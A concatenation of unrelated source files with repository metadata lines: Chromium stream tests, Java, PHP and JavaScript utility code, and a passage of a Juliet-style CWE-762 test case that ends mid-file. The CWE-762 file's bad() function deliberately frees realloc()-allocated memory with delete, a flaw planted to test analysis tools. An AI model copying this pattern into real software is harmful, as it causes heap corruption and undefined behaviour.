ASSERT(!reader.isEmpty());
ASSERT(reader.v8Value()->IsObject());
return ReadableStreamDataConsumerHandle::create(getScriptState(), reader);
}
void gc() { V8GCController::collectAllGarbageForTesting(isolate()); }
private:
OwnPtr<DummyPageHolder> m_page;
};
TEST_F(ReadableStreamDataConsumerHandleTest, Create)
{
ScriptState::Scope scope(getScriptState());
ScriptValue stream(getScriptState(), evalWithPrintingError("new ReadableStream"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
MockClient* client = MockClient::create();
Checkpoint checkpoint;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
}
TEST_F(ReadableStreamDataConsumerHandleTest, EmptyStream)
{
ScriptState::Scope scope(getScriptState());
ScriptValue stream(getScriptState(), evalWithPrintingError(
"new ReadableStream({start: c => c.close()})"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
MockClient* client = MockClient::create();
Checkpoint checkpoint;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(3));
char c;
size_t readBytes;
OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
EXPECT_EQ(kShouldWait, reader->read(&c, 1, kNone, &readBytes));
testing::runPendingTasks();
checkpoint.Call(3);
EXPECT_EQ(kDone, reader->read(&c, 1, kNone, &readBytes));
}
TEST_F(ReadableStreamDataConsumerHandleTest, ErroredStream)
{
ScriptState::Scope scope(getScriptState());
ScriptValue stream(getScriptState(), evalWithPrintingError(
"new ReadableStream({start: c => c.error()})"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
MockClient* client = MockClient::create();
Checkpoint checkpoint;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(3));
char c;
size_t readBytes;
OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
EXPECT_EQ(kShouldWait, reader->read(&c, 1, kNone, &readBytes));
testing::runPendingTasks();
checkpoint.Call(3);
EXPECT_EQ(kUnexpectedError, reader->read(&c, 1, kNone, &readBytes));
}
TEST_F(ReadableStreamDataConsumerHandleTest, Read)
{
ScriptState::Scope scope(getScriptState());
ScriptValue stream(getScriptState(), evalWithPrintingError(
"var controller;"
"var stream = new ReadableStream({start: c => controller = c});"
"controller.enqueue(new Uint8Array());"
"controller.enqueue(new Uint8Array([0x43, 0x44, 0x45, 0x46]));"
"controller.enqueue(new Uint8Array([0x47, 0x48, 0x49, 0x4a]));"
"controller.close();"
"stream"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
MockClient* client = MockClient::create();
Checkpoint checkpoint;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(3));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(4));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(5));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(6));
char buffer[3];
size_t readBytes;
OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
EXPECT_EQ(kShouldWait, reader->read(buffer, 3, kNone, &readBytes));
testing::runPendingTasks();
checkpoint.Call(3);
EXPECT_EQ(kShouldWait, reader->read(buffer, 3, kNone, &readBytes));
testing::runPendingTasks();
checkpoint.Call(4);
EXPECT_EQ(kOk, reader->read(buffer, 3, kNone, &readBytes));
EXPECT_EQ(3u, readBytes);
EXPECT_EQ(0x43, buffer[0]);
EXPECT_EQ(0x44, buffer[1]);
EXPECT_EQ(0x45, buffer[2]);
EXPECT_EQ(kOk, reader->read(buffer, 3, kNone, &readBytes));
EXPECT_EQ(1u, readBytes);
EXPECT_EQ(0x46, buffer[0]);
EXPECT_EQ(kShouldWait, reader->read(buffer, 3, kNone, &readBytes));
testing::runPendingTasks();
checkpoint.Call(5);
EXPECT_EQ(kOk, reader->read(buffer, 3, kNone, &readBytes));
EXPECT_EQ(3u, readBytes);
EXPECT_EQ(0x47, buffer[0]);
EXPECT_EQ(0x48, buffer[1]);
EXPECT_EQ(0x49, buffer[2]);
EXPECT_EQ(kOk, reader->read(buffer, 3, kNone, &readBytes));
EXPECT_EQ(1u, readBytes);
EXPECT_EQ(0x4a, buffer[0]);
EXPECT_EQ(kShouldWait, reader->read(buffer, 3, kNone, &readBytes));
testing::runPendingTasks();
checkpoint.Call(6);
EXPECT_EQ(kDone, reader->read(buffer, 3, kNone, &readBytes));
}
TEST_F(ReadableStreamDataConsumerHandleTest, TwoPhaseRead)
{
ScriptState::Scope scope(getScriptState());
ScriptValue stream(getScriptState(), evalWithPrintingError(
"var controller;"
"var stream = new ReadableStream({start: c => controller = c});"
"controller.enqueue(new Uint8Array());"
"controller.enqueue(new Uint8Array([0x43, 0x44, 0x45, 0x46]));"
"controller.enqueue(new Uint8Array([0x47, 0x48, 0x49, 0x4a]));"
"controller.close();"
"stream"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
MockClient* client = MockClient::create();
Checkpoint checkpoint;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(3));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(4));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(5));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(6));
const void* buffer;
size_t available;
OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
testing::runPendingTasks();
checkpoint.Call(3);
EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
testing::runPendingTasks();
checkpoint.Call(4);
EXPECT_EQ(kOk, reader->beginRead(&buffer, kNone, &available));
EXPECT_EQ(4u, available);
EXPECT_EQ(0x43, static_cast<const char*>(buffer)[0]);
EXPECT_EQ(0x44, static_cast<const char*>(buffer)[1]);
EXPECT_EQ(0x45, static_cast<const char*>(buffer)[2]);
EXPECT_EQ(0x46, static_cast<const char*>(buffer)[3]);
EXPECT_EQ(kOk, reader->endRead(0));
EXPECT_EQ(kOk, reader->beginRead(&buffer, kNone, &available));
EXPECT_EQ(4u, available);
EXPECT_EQ(0x43, static_cast<const char*>(buffer)[0]);
EXPECT_EQ(0x44, static_cast<const char*>(buffer)[1]);
EXPECT_EQ(0x45, static_cast<const char*>(buffer)[2]);
EXPECT_EQ(0x46, static_cast<const char*>(buffer)[3]);
EXPECT_EQ(kOk, reader->endRead(1));
EXPECT_EQ(kOk, reader->beginRead(&buffer, kNone, &available));
EXPECT_EQ(3u, available);
EXPECT_EQ(0x44, static_cast<const char*>(buffer)[0]);
EXPECT_EQ(0x45, static_cast<const char*>(buffer)[1]);
EXPECT_EQ(0x46, static_cast<const char*>(buffer)[2]);
EXPECT_EQ(kOk, reader->endRead(3));
EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
testing::runPendingTasks();
checkpoint.Call(5);
EXPECT_EQ(kOk, reader->beginRead(&buffer, kNone, &available));
EXPECT_EQ(4u, available);
EXPECT_EQ(0x47, static_cast<const char*>(buffer)[0]);
EXPECT_EQ(0x48, static_cast<const char*>(buffer)[1]);
EXPECT_EQ(0x49, static_cast<const char*>(buffer)[2]);
EXPECT_EQ(0x4a, static_cast<const char*>(buffer)[3]);
EXPECT_EQ(kOk, reader->endRead(4));
EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
testing::runPendingTasks();
checkpoint.Call(6);
EXPECT_EQ(kDone, reader->beginRead(&buffer, kNone, &available));
}
TEST_F(ReadableStreamDataConsumerHandleTest, EnqueueUndefined)
{
ScriptState::Scope scope(getScriptState());
ScriptValue stream(getScriptState(), evalWithPrintingError(
"var controller;"
"var stream = new ReadableStream({start: c => controller = c});"
"controller.enqueue(undefined);"
"controller.close();"
"stream"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
MockClient* client = MockClient::create();
Checkpoint checkpoint;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(3));
const void* buffer;
size_t available;
OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
testing::runPendingTasks();
checkpoint.Call(3);
EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
TEST_F(ReadableStreamDataConsumerHandleTest, EnqueueNull)
{
ScriptState::Scope scope(getScriptState());
ScriptValue stream(getScriptState(), evalWithPrintingError(
"var controller;"
"var stream = new ReadableStream({start: c => controller = c});"
"controller.enqueue(null);"
"controller.close();"
"stream"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
MockClient* client = MockClient::create();
Checkpoint checkpoint;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(3));
const void* buffer;
size_t available;
OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
testing::runPendingTasks();
checkpoint.Call(3);
EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
TEST_F(ReadableStreamDataConsumerHandleTest, EnqueueString)
{
ScriptState::Scope scope(getScriptState());
ScriptValue stream(getScriptState(), evalWithPrintingError(
"var controller;"
"var stream = new ReadableStream({start: c => controller = c});"
"controller.enqueue('hello');"
"controller.close();"
"stream"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
MockClient* client = MockClient::create();
Checkpoint checkpoint;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(3));
const void* buffer;
size_t available;
OwnPtr<FetchDataConsumerHandle::Reader> reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
testing::runPendingTasks();
checkpoint.Call(3);
EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
TEST_F(ReadableStreamDataConsumerHandleTest, StreamReaderShouldBeWeak)
{
OwnPtr<FetchDataConsumerHandle::Reader> reader;
Checkpoint checkpoint;
Persistent<MockClient> client = MockClient::create();
ScriptValue stream;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(checkpoint, Call(3));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(4));
{
// We need this scope to collect local handles.
ScriptState::Scope scope(getScriptState());
stream = ScriptValue(getScriptState(), evalWithPrintingError("new ReadableStream()"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
}
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
stream.clear();
gc();
checkpoint.Call(3);
testing::runPendingTasks();
checkpoint.Call(4);
const void* buffer;
size_t available;
EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
TEST_F(ReadableStreamDataConsumerHandleTest, StreamReaderShouldBeWeakWhenReading)
{
OwnPtr<FetchDataConsumerHandle::Reader> reader;
Checkpoint checkpoint;
Persistent<MockClient> client = MockClient::create();
ScriptValue stream;
InSequence s;
EXPECT_CALL(checkpoint, Call(1));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(2));
EXPECT_CALL(checkpoint, Call(3));
EXPECT_CALL(checkpoint, Call(4));
EXPECT_CALL(*client, didGetReadable());
EXPECT_CALL(checkpoint, Call(5));
{
// We need this scope to collect local handles.
ScriptState::Scope scope(getScriptState());
stream = ScriptValue(getScriptState(), evalWithPrintingError("new ReadableStream()"));
ASSERT_FALSE(stream.isEmpty());
OwnPtr<ReadableStreamDataConsumerHandle> handle = createHandle(stream);
ASSERT_TRUE(handle);
reader = handle->obtainReader(client);
ASSERT_TRUE(reader);
}
const void* buffer;
size_t available;
checkpoint.Call(1);
testing::runPendingTasks();
checkpoint.Call(2);
EXPECT_EQ(kShouldWait, reader->beginRead(&buffer, kNone, &available));
testing::runPendingTasks();
checkpoint.Call(3);
stream.clear();
gc();
checkpoint.Call(4);
testing::runPendingTasks();
checkpoint.Call(5);
EXPECT_EQ(kUnexpectedError, reader->beginRead(&buffer, kNone, &available));
}
} // namespace
} // namespace blink
| highweb-project/highweb-webcl-html5spec | third_party/WebKit/Source/modules/fetch/ReadableStreamDataConsumerHandleTest.cpp | C++ | bsd-3-clause | 19,032 |
//
// Scaled - a scalable editor extensible via JVM languages
// http://github.com/scaled/scaled/blob/master/LICENSE
package scaled;
import java.lang.annotation.ElementType;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
import java.lang.annotation.Target;
/**
* Defines a configuration var. Modes define configuration vars which can subsequently be
* customized by the user in a mode configuration file, or interactively.
*/
@Target(ElementType.METHOD)
@Retention(RetentionPolicy.RUNTIME)
public @interface Var {
/** A documentary description of this configuration var. This will be shown to the user when
* they ask to describe the var, so don't hold back on the details. */
String value ();
}
| swhgoon/scaled | api/src/main/java/scaled/Var.java | Java | bsd-3-clause | 753 |
<?php
use Zend\View;
use \CodeEmailMKT\Infrastructure;
use CodeEmailMKT\Application\Form\{CustomerForm, LoginForm, TagForm};
use CodeEmailMKT\Application\Form\Factory\{CustomerFormFactory, LoginFormFactory, TagFormFactory};
$forms = [
'dependencies' => [
'aliases' => [
],
'invokables' => [
],
'factories' => [
View\HelperPluginManager::class => Infrastructure\View\HelperPluginManagerFactory::class,
LoginForm::class => LoginFormFactory::class,
CustomerForm::class => CustomerFormFactory::class,
TagForm::class => TagFormFactory::class
]
],
'view_helpers' => [
'aliases' => [
],
'invokables' => [
],
'factories' => [
'identity' => View\Helper\Service\IdentityFactory::class
]
]
];
$configProviderForm = (new \Zend\Form\ConfigProvider())->__invoke();
return Zend\Stdlib\ArrayUtils::merge($configProviderForm, $forms); | yuri-calabrez/code-education-php7 | config/autoload/form.global.php | PHP | bsd-3-clause | 996 |
// vim:filetype=java:ts=4
/*
Copyright (c) 2005, 2006, 2007
Conor McDermottroe. All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions
are met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. Neither the name of the author nor the names of any contributors to
the software may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDERS OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,
OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.mcdermottroe.exemplar.input;
import com.mcdermottroe.exemplar.Exception;
/** An exception that can be thrown in response to any error in the input phase
of the program.
@author Conor McDermottroe
@since 0.1
*/
public class InputException
extends Exception
{
/** InputException without a description. */
public InputException() {
super();
}
/** InputException with a description.
@param message The description of the exception.
*/
public InputException(String message) {
super(message);
}
/** InputException with a description and a reference to an exception which
caused it.
@param message The description of the exception.
@param cause The cause of the exception.
*/
public InputException(String message, Throwable cause) {
super(message, cause);
}
/** InputException with a reference to the exception that caused it.
@param cause The cause of the exception.
*/
public InputException(Throwable cause) {
super(cause);
}
/** {@inheritDoc} */
public InputException getCopy() {
InputException copy;
String message = getMessage();
Throwable cause = getCause();
if (message != null && cause != null) {
copy = new InputException(message, cause);
} else if (message != null) {
copy = new InputException(message);
} else if (cause != null) {
copy = new InputException(cause);
} else {
copy = new InputException();
}
copy.setStackTrace(copyStackTrace(getStackTrace()));
return copy;
}
}
| conormcd/exemplar | src/com/mcdermottroe/exemplar/input/InputException.java | Java | bsd-3-clause | 3,051 |
package sensor;
import core.Sensor;
import edu.wpi.first.wpilibj.Joystick;
import event.events.ButtonEvent;
import event.events.XboxJoystickEvent;
import event.listeners.ButtonListener;
import event.listeners.XboxJoystickListener;
import java.util.Enumeration;
import java.util.Vector;
/**
* Wrapper class for an XBox controller.
*
* @author ajc
*/
public class GRTXBoxJoystick extends Sensor {
/**
* Keys of data
*/
public static final int KEY_BUTTON_0 = 0;
public static final int KEY_BUTTON_1 = 1;
public static final int KEY_BUTTON_2 = 2;
public static final int KEY_BUTTON_3 = 3;
public static final int KEY_BUTTON_4 = 4;
public static final int KEY_BUTTON_5 = 5;
public static final int KEY_BUTTON_6 = 6;
public static final int KEY_BUTTON_7 = 7;
public static final int KEY_BUTTON_8 = 8;
public static final int KEY_BUTTON_9 = 9;
public static final int KEY_LEFT_X = 10;
public static final int KEY_LEFT_Y = 11;
public static final int KEY_RIGHT_X = 12;
public static final int KEY_RIGHT_Y = 13;
public static final int KEY_JOYSTICK_ANGLE = 14;
public static final int KEY_TRIGGER = 15;
public static final int KEY_PAD = 16;
private static final int NUM_DATA = 17;
private static final int NUM_OF_BUTTONS = 10;
/**
* State definitions
*/
public static final double PRESSED = TRUE;
public static final double RELEASED = FALSE;
private final Joystick joystick;
private final Vector buttonListeners;
private final Vector joystickListeners;
/**
* Instantiates a new GRTXBoxJoystick.
*
* @param channel USB channel joystick is plugged into
* @param pollTime how often to poll the joystick
* @param name this joystick's name
*/
public GRTXBoxJoystick(int channel, int pollTime, String name) {
super(name, pollTime, NUM_DATA);
joystick = new Joystick(channel);
buttonListeners = new Vector();
joystickListeners = new Vector();
}
protected void poll() {
for (int i = 0; i < NUM_OF_BUTTONS; i++)
//if we measure true, this indicates pressed state
setState(i, joystick.getRawButton(i) ? PRESSED : RELEASED);
setState(KEY_LEFT_X, joystick.getX());
setState(KEY_LEFT_Y, joystick.getY());
setState(KEY_RIGHT_X, joystick.getRawAxis(4));
setState(KEY_RIGHT_Y, joystick.getRawAxis(5));
setState(KEY_JOYSTICK_ANGLE, joystick.getDirectionRadians());
setState(KEY_TRIGGER, joystick.getZ());
setState(KEY_PAD, joystick.getRawAxis(6));
}
protected void notifyListeners(int id, double newDatum) {
if (id < NUM_OF_BUTTONS) {
//ID maps directly to button ID
ButtonEvent e = new ButtonEvent(this, id, newDatum == PRESSED);
if (newDatum == PRESSED) //true
for (Enumeration en = buttonListeners.elements(); en.
hasMoreElements();)
((ButtonListener) en.nextElement()).buttonPressed(e);
else
for (Enumeration en = buttonListeners.elements(); en.
hasMoreElements();)
((ButtonListener) en.nextElement()).buttonReleased(e);
} else { //we are now a joystick
//only reach here if not a button
XboxJoystickEvent e = new XboxJoystickEvent(this, id, newDatum);
//call various events based on which datum we are
switch (id) {
case KEY_LEFT_X: {
for (Enumeration en = joystickListeners.elements(); en.
hasMoreElements();)
((XboxJoystickListener) en.nextElement()).
leftXAxisMoved(e);
break;
}
case KEY_LEFT_Y: {
for (Enumeration en = joystickListeners.elements(); en.
hasMoreElements();)
((XboxJoystickListener) en.nextElement()).
leftYAxisMoved(e);
break;
}
case KEY_RIGHT_X: {
for (Enumeration en = joystickListeners.elements(); en.
hasMoreElements();)
((XboxJoystickListener) en.nextElement()).
rightXAxisMoved(e);
break;
}
case KEY_RIGHT_Y: {
for (Enumeration en = joystickListeners.elements(); en.
hasMoreElements();)
((XboxJoystickListener) en.nextElement()).
rightYAxisMoved(e);
break;
}
case KEY_JOYSTICK_ANGLE: {
for (Enumeration en = joystickListeners.elements(); en.
hasMoreElements();)
((XboxJoystickListener) en.nextElement()).
leftAngleChanged(e);
break;
}
case KEY_TRIGGER: {
for (Enumeration en = joystickListeners.elements(); en.
hasMoreElements();)
((XboxJoystickListener) en.nextElement()).
triggerMoved(e);
break;
}
case KEY_PAD: {
for (Enumeration en = joystickListeners.elements(); en.
hasMoreElements();)
((XboxJoystickListener) en.nextElement()).padMoved(e);
break;
}
}
}
}
public void addButtonListener(ButtonListener b) {
buttonListeners.addElement(b);
}
public void removeButtonListener(ButtonListener b) {
buttonListeners.removeElement(b);
}
public void addJoystickListener(XboxJoystickListener l) {
joystickListeners.addElement(l);
}
public void removeJoystickListener(XboxJoystickListener l) {
joystickListeners.removeElement(l);
}
}
| grt192/grtframework | src/sensor/GRTXBoxJoystick.java | Java | bsd-3-clause | 6,230 |
<?php
namespace core\users\controllers\frontend;
use core\fileapi\actions\UploadAction as FileAPIUpload;
use core\users\models\frontend\Email;
use core\users\models\frontend\PasswordForm;
use core\users\models\Profile;
use core\users\Module;
use yii\filters\AccessControl;
use yii\web\Controller;
use yii\web\Response;
use yii\widgets\ActiveForm;
use Yii;
/**
* Frontend controller for authenticated users.
*/
class UserController extends Controller
{
/**
* @inheritdoc
*/
public function behaviors()
{
return [
'access' => [
'class' => AccessControl::className(),
'rules' => [
[
'allow' => true,
'roles' => ['@']
]
]
]
];
}
/**
* @inheritdoc
*/
public function actions()
{
return [
'auth' => [
'class' => 'yii\authclient\AuthAction',
'successCallback' => [$this, 'oAuthSuccess'],
],
];
}
/**
* Log Out page.
*/
public function actionLogout()
{
Yii::$app->user->logout();
return $this->goHome();
}
/**
* Change password page.
*/
public function actionPassword()
{
$model = new PasswordForm();
if ($model->load(Yii::$app->request->post())) {
if ($model->validate()) {
if ($model->password()) {
Yii::$app->session->setFlash(
'success',
Module::t('users', 'FRONTEND_FLASH_SUCCESS_PASSWORD_CHANGE')
);
return $this->goHome();
} else {
Yii::$app->session->setFlash('danger', Module::t('users', 'FRONTEND_FLASH_FAIL_PASSWORD_CHANGE'));
return $this->refresh();
}
} elseif (Yii::$app->request->isAjax) {
Yii::$app->response->format = Response::FORMAT_JSON;
return ActiveForm::validate($model);
}
}
return $this->render(
'password',
[
'model' => $model
]
);
}
/**
* Request email change page.
*/
public function actionEmail()
{
$model = new Email();
if ($model->load(Yii::$app->request->post())) {
if ($model->validate()) {
if ($model->save(false)) {
Yii::$app->session->setFlash('success', Module::t('users', 'FRONTEND_FLASH_SUCCES_EMAIL_CHANGE'));
return $this->goHome();
} else {
Yii::$app->session->setFlash('danger', Module::t('users', 'FRONTEND_FLASH_FAIL_EMAIL_CHANGE'));
return $this->refresh();
}
} elseif (Yii::$app->request->isAjax) {
Yii::$app->response->format = Response::FORMAT_JSON;
return ActiveForm::validate($model);
}
}
return $this->render(
'email',
[
'model' => $model
]
);
}
/**
* Profile updating page.
*/
public function actionUpdate()
{
$model = Profile::findByUserId(Yii::$app->user->id);
if ($model->load(Yii::$app->request->post())) {
if ($model->validate()) {
if ($model->save(false)) {
Yii::$app->session->setFlash('success', Module::t('users', 'FRONTEND_FLASH_SUCCES_UPDATE'));
} else {
Yii::$app->session->setFlash('danger', Module::t('users', 'FRONTEND_FLASH_FAIL_UPDATE'));
}
return $this->refresh();
} elseif (Yii::$app->request->isAjax) {
Yii::$app->response->format = Response::FORMAT_JSON;
return ActiveForm::validate($model);
}
}
return $this->render(
'update',
[
'model' => $model
]
);
}
}
| MovieDogBall/Testwork | vendor/core/yii2-users-module/controllers/frontend/UserController.php | PHP | bsd-3-clause | 4,168 |
'use strict';
const assert = require('assert');
const { Observable } = require('rx-lite');
/**
*
* @param {Rx.Observable} observable
* @param {function} fn
* @returns {Rx.IPromise<void>}
*/
function checkError(observable, fn) {
const OK = {};
return observable
.catch(err => {
fn(err);
return Observable.just(OK);
})
.toPromise()
.then(value => {
assert.deepStrictEqual(value, OK);
});
}
module.exports = checkError;
| groupon/shared-store | test/check-error.js | JavaScript | bsd-3-clause | 468 |
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE762_Mismatched_Memory_Management_Routines__delete_long_realloc_12.cpp
Label Definition File: CWE762_Mismatched_Memory_Management_Routines__delete.label.xml
Template File: sources-sinks-12.tmpl.cpp
*/
/*
* @description
* CWE: 762 Mismatched Memory Management Routines
* BadSource: realloc Allocate data using realloc()
* GoodSource: Allocate data using new
* Sinks:
* GoodSink: Deallocate data using free()
* BadSink : Deallocate data using delete
* Flow Variant: 12 Control flow: if(globalReturnsTrueOrFalse())
* */
#include "std_testcase.h"
namespace CWE762_Mismatched_Memory_Management_Routines__delete_long_realloc_12
{
#ifndef OMITBAD
void bad()
{
long * data;
/* Initialize data*/
data = NULL;
if(globalReturnsTrueOrFalse())
{
data = NULL;
/* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
data = (long *)realloc(data, 100*sizeof(long));
if (data == NULL) {exit(-1);}
}
else
{
/* FIX: Allocate memory from the heap using new */
data = new long;
}
if(globalReturnsTrueOrFalse())
{
/* POTENTIAL FLAW: Deallocate memory using delete - the source memory allocation function may
* require a call to free() to deallocate the memory */
delete data;
}
else
{
/* FIX: Deallocate the memory using free() */
free(data);
}
}
#endif /* OMITBAD */
#ifndef OMITGOOD
/* goodB2G() - use badsource and goodsink by changing the first "if" so that
both branches use the BadSource and the second "if" so that both branches
use the GoodSink */
static void goodB2G()
{
long * data;
/* Initialize data*/
data = NULL;
if(globalReturnsTrueOrFalse())
{
data = NULL;
/* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
data = (long *)realloc(data, 100*sizeof(long));
if (data == NULL) {exit(-1);}
}
else
{
data = NULL;
/* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
data = (long *)realloc(data, 100*sizeof(long));
if (data == NULL) {exit(-1);}
}
if(globalReturnsTrueOrFalse())
{
/* FIX: Deallocate the memory using free() */
free(data);
}
else
{
/* FIX: Deallocate the memory using free() */
free(data);
}
}
/* goodG2B() - use goodsource and badsink by changing the first "if" so that
both branches use the GoodSource and the second "if" so that both branches
use the BadSink */
static void goodG2B()
{
long * data;
/* Initialize data*/
data = NULL;
if(globalReturnsTrueOrFalse())
{
/* FIX: Allocate memory from the heap using new */
data = new long;
}
else
{
/* FIX: Allocate memory from the heap using new */
data = new long;
}
if(globalReturnsTrueOrFalse())
{
/* POTENTIAL FLAW: Deallocate memory using delete - the source memory allocation function may
* require a call to free() to deallocate the memory */
delete data;
}
else
{
/* POTENTIAL FLAW: Deallocate memory using delete - the source memory allocation function may
* require a call to free() to deallocate the memory */
delete data;
}
}
void good()
{
goodB2G();
goodG2B();
}
#endif /* OMITGOOD */
} /* close namespace */
/* Below is the main(). It is only used when building this testcase on
its own for testing or for building a binary to use in testing binary
analysis tools. It is not used when compiling all the testcases as one
application, which is how source code analysis tools are tested. */
#ifdef INCLUDEMAIN
